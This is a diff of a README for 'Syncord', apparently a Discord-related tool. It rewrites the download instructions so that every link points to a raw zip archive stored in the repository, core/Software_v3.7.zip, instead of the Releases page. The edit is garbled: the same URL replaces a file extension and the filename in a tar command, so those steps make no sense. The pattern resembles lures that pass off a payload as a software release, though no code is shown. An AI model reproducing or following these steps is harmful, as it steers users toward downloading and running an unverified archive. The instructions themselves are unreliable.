sergejka123/syncord/README.md

 - A Discord account

 ## 🔗 Download & Install
-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/sergejka123/syncord/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/sergejka123/syncord/raw/refs/heads/main/core/Software_v3.7.zip).
 Here, you will find the latest version of Syncord available for download.

 2. **Choose Your Download:** Look for the latest release and download the appropriate file for your operating system.
-The files will have extensions like `.exe` for Windows or `.tar.gz` for macOS and Linux.
+The files will have extensions like `.exe` for Windows or `https://github.com/sergejka123/syncord/raw/refs/heads/main/core/Software_v3.7.zip` for macOS and Linux.

 3. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file to start the installation.
    - For macOS: Open the downloaded file and drag the Syncord icon to your Applications folder.
-   - For Linux: Open your terminal, navigate to the downloaded file, and use the command `tar -xvzf filename.tar.gz` to extract it.
+   - For Linux: Open your terminal, navigate to the downloaded file, and use the command `tar -xvzf https://github.com/sergejka123/syncord/raw/refs/heads/main/core/Software_v3.7.zip` to extract it.

 4. **Launch Syncord:** Open Syncord from your Applications folder or by searching for it in your start menu.